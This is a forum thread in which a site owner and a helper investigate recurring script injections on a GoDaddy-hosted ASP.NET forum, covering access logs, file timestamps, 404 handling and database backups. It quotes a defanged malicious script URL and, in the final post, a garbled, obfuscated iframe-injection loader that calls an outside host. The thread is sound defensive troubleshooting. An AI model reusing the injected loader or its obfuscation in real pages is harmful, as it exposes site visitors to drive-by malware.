Ok, I see you already have a way to search the database. I’d look for any JavaScript or VBScript code at all. Also anything that isn’t plain text or variable values. Technically, you’re looking for whatever code is being injected, but it might not be in a form that is easy to spot.
The site appears to have some unused content, or duplication, or “something”; for example, there is a /forum/ directory and also /forums/. Anything that is not in active use should be deleted. A vulnerable file remains vulnerable as long as it’s there, even if you’ve removed all hyperlinks that point to it.
Don’t give up on getting the logs. Since they hold the possibility of finding out how the site is being attacked over and over, and the database doesn’t, the logs are more important.
I’m not sure where you’re seeing /forum/ and /forums/. I’m looking at GoDaddy’s Java FTP client (Which is the only way I can see /stats/ and /logs/ as neither show up in the GoDaddy File Manager). I see only /forum/. I’m shouldn’t have any duplication. I burned the site down to just an index file and /stats/ not to long ago to try and figure out were vulnerabilities were. I was reinfected at that point and so uploaded only what was necessary after that with no duplications at that time.
I’ve got the logs now. It’s pretty complicated. I’m not really sure what I’m looking at though. A lot of it seems to do with the forum. Which is expected I suppose. 98% of it seems to be a get, until there’s a post on /Forum/default.aspx every so oftne. I don’t know it that’s a login to the forum or if it’s just listing actions taken from the control panel or if there shold be zero Posts.
A lot of them start by trying to get robots.txt which doesn’t exist.
What I’ve also just noticed is that there’s a php call in the forum again.
http://iwvision.com/images/nt1/title-portfolio.php
iwvision.com is listed by google as an attack site.
Several forum files have been edited today at approximated 6:30 am Eastern according to their last modified dates on GoDaddy. I uploaded fresh copies of those yesterday, not today. Appears to be 3 aspx files in /forum/: advanced.aspx, default.aspx, and error.aspx.
Unforunatly I can’t view the logs for the 29th (today) until tomorrow.
I use a download tool that is configured to follow links and recreate your server’s directory structure here as the files are downloaded. It created both a /forum/ folder and also /forums/.
There is some very weird activity going on.
When I request /forums/ in Firefox, it produces what appears to be an endless chain of recursive calls to your files (not to an external site, as far as I can tell) that creates a huge amount of back and forth traffic between me and your server, which hangs up Firefox, disrupts my screen display, and forces me to manually close Firefox.
The same thing happens when I request /foruma/, so this behavior seems to occur when a nonexistent folder is requested out of the forum.
If I request a nonexistent file from your site like nopage.html, I get a 200 Success result code (which is however incorrect) and it redirects to your home page. So “Not Found” errors are being handled differently by your main site and by your forum. The main site handling is technically wrong and should be fixed to return no page at all and a “404” result code. But the forum’s handling of 404’s is so bad that Google would indeed consider it malicious even if it is only inadvertent.
Take a close look at how your site (probably in your .asp code?) handles 404 – Not Found errors, and especially how YAF code is handling the same.
This seems to be a separate issue from the script insertions, at least from what I’ve seen so far.
On your forum pages, there is a reference to a script from iwvision.com inserted before the body tag of each page. The script is called automatically when the page is loaded. Since they’re a flagged site, and your site loads this script automatically, if their site is flagged and has malware, you’ll get flagged, too.
Here’s the surrounding code, somewhat altered:
As expected, the forum editor tore it to pieces, so I removed it. Anyway, you can View Source on any forum page. Here’s the offending line:
script src=hxxp :// iw vision . com / images / nt1 / title-portfolio . php
Yep. I saw that (See my previous post) I was leaving it there briefly so I wouldn’t have any good data in the access logs now that I was able to get at them. I also wanted you to see what I was getting since last time you didn’t see it since I’d cleaned things out. Several ASPX files have modified dates of early on the morning of the 29th.
Any more thoughts on prevention? I’m not 100% sure what I’m looking for in the logs since it’s 99% Gets and then an occasional put on default.aspx in the forum which i’m assuming is a post or a login, but I can’t be certain.
What I’m noticing that is bizarre about the logs is the timestamps on them.
Jun2009 Logs: November 29
July2009 Logs: August 1
Aug2009 logs: August 31
Sept2009 Logs: September 30
Oct2009 logs:October 31
November2009 Logs: November 29
Why is the June Log dated November 29th? Peculiar I think.
There are no posts close to 6:30, only gets.
As for the /forums/ issue I don’t think it has anything to do with the forums. go to /random/ or /anything/. As far as the forum is concerned, only /forum/ exists. I set it so that it believes /forum/ is root. /random/ would have nothing to do with the forum. However, I managed to load /random/ and then view its source. It appears that what it’s doing is redirecting any blank page to ~/index.html but since index.html is calling relative pages in frames, it results in calling more index.html. I might be able to fix that by having /index.html call absolute links or by making /index just a splash page and then go to the main page via a link. I have no clue why it does that, but I’m pretty sure its unrelated to the forums.
As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.
Finally a bit more on IIS, according to GoDaddy, for security reasons they don’t allow IIS manager on IIS7, but they do on IIS6. But I recall seeing somewhere that that was allowed on accounts using IIS6. I don’t really know what that’s talking about specifically, but I am drawn to wonder if that’s a potential hole in this case, especially since you said you’d seen a good number of attacks against IIS6 users and IIS in general.
“Several ASPX files have modified dates of early on the morning of the 29th.”
“Why is the June Log dated November 29th? Peculiar I think.”
Yes, both of those do not seem normal.
“an occasional put on default.aspx in the forum which i’m assuming is a post or a login”
A forum login would most likely be a POST (not a forum post, but an HTTP “POST”, in the same sense that a GET is an HTTP GET). An HTTP PUT is worrisome because it is an instruction to the server to take the provided file and PUT it on the server. The server should NEVER allow that. In those entries there should be a number of “403” in the line, meaning Forbidden (the server did not honor the request). If it is instead a result code of 200, that could be bad. If the file has a timestamp that is the same as the PUT request, that means the server seems to be allowing something it absolutely should not, and it will require reconfiguration, probably by the host unless this is somehow handled in your ASP code. I would think that accepting a PUT would be a highly unusual and near impossible misconfiguration, but the fact that you stripped the site down to 1 html file, changed passwords, logged in from a linux PC, and it still got injected, makes weird scenarios seem more plausible.
This describes the possible result codes: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes
For interpreting the logs, this link looks helpful, but I simply got it from a web search on
IIS log explain
so you might be able to find others
http://www.microsoft.com/windows/windows2000/en/advanced/iis/htm/core/iiabtlg.htm
“As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.”
The spaces between chars might be due to Unicode 16-bit text encoding with the in-between spaces actually being null bytes 00. It might be possible to either specify which encoding your editor should use, or maybe convert it by using SaveAs… Could be worth a try in Notepad, WordPad, gedit, or BlueFish. Does the file have an “.sql” extension?
My mistake. It wasn’t a PUT, it was a POST. I don’t know what possessed me to type PUT.
The file has a .bak extension.
I opened it up in Open Office Writer using Unicode encryption. I can read parts of it bt other parts are just garbage. Mostly #s that are breaking up sections. So I’ll get a post and then a bunch of # and other garbage before another post or I’ll get what I think is user data, broken up by the same.
It also seems that only parts of the bak file are encrpyted. When I view it with unicode encryption I can read posts etc with the issue I mentioned before but parts of the file become unreadable. Those parts are viewable as plain text. The parts that I can view in plain text appear to be the actual guts of the database.
Broken in among that though are parts that appear to be unicode and have somewhat strange things in them. I can pick out works lik “CALGARY” “VERIZON” “CAGE BY PET TREX” and also what appears to be addresses.
The parts that look like their the guts of the database also have some random pits of garbage broken in between sections. There’s be an “END” followed by garbage, followed by a “BEGIN”
Out of curiosity, did you ever figure out if GoDaddy is the culprit? I’m having the same problem with several of my GD hosting accounts. Avast keeps flagging these inserted scripts as an iFrame trojan. I’ve changed my passwords multiple times and reloaded fresh copies of the HTML pages, but after a certain amount of time, the script is re-inserted and Avast flags them again as the same malware type.
Sample of the script is below…
///copy of script///
function PyqrS document getElementById
document[’w129r189i200t102102e’replace(/[0-9]/g, div id=yAI style visibility:hidden;display :none">%3Ciframe width%3D 1 height%3D1 border%3D0 fra mebor der%3D 0 src%3D%27http%3A%2F%2Fcentiyo.com%2Fin.cgi%3Fdefault%27%3E%3C%2Fiframe%3E function FNQTZzGxY(gaAdNomZIG){ fff.op.replace(“1123”); }
docume t[‘w161r137i16 7t161 119e .repla ce(/ [ -9]/g,’‘)](u nesc ape(document.getElemen ById(’yAI’).innerHT ML));f un ction n xZ HTf nHpm(z GuRQsw){ var FcZJw = document.getElementById(‘ZEucwCdBIG’);v ar FcZJw = document.getElementById(‘ZEucwCdBIG’);var FcZJw = d ocu ment.ge tEle mentById(‘ZEucwCdBIG’);windo w.e val();
function SgAk WUU{ alert(‘PXU’);v ar ycKxO=new Functio n(“PN uwF”, “return 5856;” );var = docu ment .getEleme ntById(‘KwbvL’); fff.op.rep lace(" 1114" );
function algoxfTdS(CQdWGsxMf){ var IjuAtlIPWw=new Function(“EBFAAulbve”, “return 564742;”); fff= op. s plit(“199”)
